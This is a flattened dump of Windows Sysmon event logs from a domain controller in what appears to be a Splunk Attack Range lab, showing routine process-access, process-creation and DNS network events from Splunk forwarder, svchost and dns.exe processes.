Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.147{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.148{266CAFBE-64C1-6064-8F00-00000000AE01}3960C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.034{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62656- 354300x80000000000000003870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.034{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local59783- 354300x80000000000000003869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.033{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local54707- 354300x80000000000000003868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.032{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64829- 354300x80000000000000003867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.031{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57961- 
354300x80000000000000003866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.030{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local56189- 354300x80000000000000003865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.029{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63330- 354300x80000000000000003864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.027{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60570- 354300x80000000000000003863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.026{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59714- 354300x80000000000000003862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.024{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63268- 354300x80000000000000003861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.024{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61743- 354300x80000000000000003860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:08.023{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64947- 354300x80000000000000003859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.021{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59667- 354300x80000000000000003858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.021{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58463- 354300x80000000000000003857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.020{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58247- 354300x80000000000000003856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.019{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58151- 354300x80000000000000003855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.018{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57415- 354300x80000000000000003854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.016{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63479- 354300x80000000000000003853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.015{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63992- 354300x80000000000000003852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.012{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57716- 354300x80000000000000003851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.011{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62539- 354300x80000000000000003850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.010{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61823- 354300x80000000000000003849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.009{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57714- 354300x80000000000000003848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.009{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63797- 354300x80000000000000003847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.008{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60525- 354300x80000000000000003846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.007{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58447- 354300x80000000000000003845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.005{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61886- 354300x80000000000000003844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.004{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63703- 354300x80000000000000003843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.004{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58832- 354300x80000000000000003842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.003{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64925- 354300x80000000000000003841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.001{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60335- 354300x80000000000000003840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.000{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62465- 354300x80000000000000003839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.999{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61051- 354300x80000000000000003838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.998{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63865- 354300x80000000000000003837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.997{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59202- 354300x80000000000000003836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.996{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65365- 354300x80000000000000003835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.995{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60099- 10341000x80000000000000004182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
